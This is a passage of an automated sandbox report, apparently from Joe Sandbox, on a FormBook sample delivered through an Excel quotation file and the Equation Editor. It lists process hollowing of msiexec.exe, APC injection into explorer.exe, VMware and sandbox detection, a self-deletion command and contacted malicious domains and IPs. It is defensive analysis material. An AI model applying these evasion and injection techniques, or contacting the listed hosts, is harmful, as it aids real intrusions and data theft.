            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00A3FEA0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00A3FED0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,5_2_00A3FFB4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A410D0 NtOpenProcessToken,5_2_00A410D0
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A40060 NtQuerySection,5_2_00A40060
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A401D4 NtSetValueKey,5_2_00A401D4
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A4010C NtOpenDirectoryObject,5_2_00A4010C
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A41148 NtOpenThread,5_2_00A41148
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A407AC NtCreateMutant,5_2_00A407AC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A3F8CC NtWaitForSingleObject,5_2_00A3F8CC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027100C4 NtCreateFile,LdrInitializeThunk,8_2_027100C4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027107AC NtCreateMutant,LdrInitializeThunk,8_2_027107AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FAE8 NtQueryInformationProcess,LdrInitializeThunk,8_2_0270FAE8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FB68 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0270FB68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FB50 NtCreateKey,LdrInitializeThunk,8_2_0270FB50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FBB8 NtQueryInformationToken,LdrInitializeThunk,8_2_0270FBB8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F900 NtReadFile,LdrInitializeThunk,8_2_0270F900
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F9F0 NtClose,LdrInitializeThunk,8_2_0270F9F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_0270FED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FFB4 NtCreateSection,LdrInitializeThunk,8_2_0270FFB4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC60 NtMapViewOfSection,LdrInitializeThunk,8_2_0270FC60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FDC0 NtQuerySystemInformation,LdrInitializeThunk,8_2_0270FDC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FD8C NtDelayExecution,LdrInitializeThunk,8_2_0270FD8C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710078 NtResumeThread,8_2_02710078
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710060 NtQuerySection,8_2_02710060
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710048 NtProtectVirtualMemory,8_2_02710048
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027110D0 NtOpenProcessToken,8_2_027110D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02711148 NtOpenThread,8_2_02711148
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271010C NtOpenDirectoryObject,8_2_0271010C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027101D4 NtSetValueKey,8_2_027101D4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FA50 NtEnumerateValueKey,8_2_0270FA50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FA20 NtQueryInformationFile,8_2_0270FA20
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FAD0 NtAllocateVirtualMemory,8_2_0270FAD0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FAB8 NtQueryValueKey,8_2_0270FAB8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FBE8 NtQueryVirtualMemory,8_2_0270FBE8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F8CC NtWaitForSingleObject,8_2_0270F8CC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02711930 NtSetContextThread,8_2_02711930
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270F938 NtWriteFile,8_2_0270F938
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FE24 NtWriteVirtualMemory,8_2_0270FE24
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FEA0 NtReadVirtualMemory,8_2_0270FEA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FF34 NtQueueApcThread,8_2_0270FF34
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FFFC NtCreateProcessEx,8_2_0270FFFC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02710C40 NtGetContextThread,8_2_02710C40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC48 NtSetInformationFile,8_2_0270FC48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC30 NtOpenProcess,8_2_0270FC30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FC90 NtUnmapViewOfSection,8_2_0270FC90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FD5C NtEnumerateKey,8_2_0270FD5C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02711D80 NtSuspendThread,8_2_02711D80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000A9D50 NtCreateFile,8_2_000A9D50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000A9E00 NtReadFile,8_2_000A9E00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000A9E80 NtClose,8_2_000A9E80
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: rundll32[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: (QUOTATION)B-RUS-20061REV2.xlsxReversingLabs: Detection: 28%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$(QUOTATION)B-RUS-20061REV2.xlsxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD74B.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@10/10@2/3
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
            Source: explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.507251158.00000000007CA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe
            Source: C:\Users\Public\vbc.exeCode function: 4_2_01007C03 push es; ret 4_2_01007F96
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA5CE0 push 8A4000C4h; ret 4_2_00FA5CEE
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA5C89 push 8A3400C4h; ret 4_2_00FA5C96
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA5C30 push 898C00C4h; ret 4_2_00FA5C3E
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00FA3BB0 push es; iretd 4_2_00FA3BB1
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004178AB pushfd ; ret 5_2_004178AC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0040E27F push edx; iretd 5_2_0040E280
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409BD5 push esp; iretd 5_2_00409BDC
            Source: C:\Users\Public\vbc.exeCode function: 5_2_004175F8 push edx; iretd 5_2_00417628
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00419DA2 pushad ; retf 5_2_00419DAB
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041660F push edx; iretd 5_2_00416610
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CEF2 push eax; ret 5_2_0041CEF8
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CEFB push eax; ret 5_2_0041CF62
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CEA5 push eax; ret 5_2_0041CEF8
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CF5C push eax; ret 5_2_0041CF62
            Source: C:\Users\Public\vbc.exeCode function: 5_2_01007C03 push es; ret 5_2_01007F96
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0271DFA1 push ecx; ret 8_2_0271DFB4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0009E27F push edx; iretd 8_2_0009E280
            Source: initial sampleStatic PE information: section name: .text entropy: 7.61448564553
            Source: initial sampleStatic PE information: section name: .text entropy: 7.61448564553
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEB
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 4.2.vbc.exe.25b91f4.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2796, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 2752Thread sleep time: -32547s >= -30000sJump to behavior
            Source: C:\Users\Public\vbc.exe TID: 1164Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1724Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A80 rdtsc 5_2_00409A80
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 32547Jump to behavior
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000006.00000000.482198616.0000000008392000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0V
            Source: explorer.exe, 00000006.00000000.483720913.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000006.00000000.479521551.00000000045CF000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000006.00000000.534150021.000000000457A000.00000004.00000001.sdmpBinary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________q_
            Source: vbc.exe, 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A80 rdtsc 5_2_00409A80
            Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 5_2_00A526F8 mov eax, dword ptr fs:[00000030h]5_2_00A526F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_027226F8 mov eax, dword ptr fs:[00000030h]8_2_027226F8
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 5_2_0040ACC0 LdrLoadDll,5_2_0040ACC0
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.paradisgrp.com
            Source: C:\Windows\explorer.exeNetwork Connect: 128.65.195.232 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.uvoyus.com
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: A30000Jump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
            Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
            Source: explorer.exe, 00000006.00000000.493433605.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

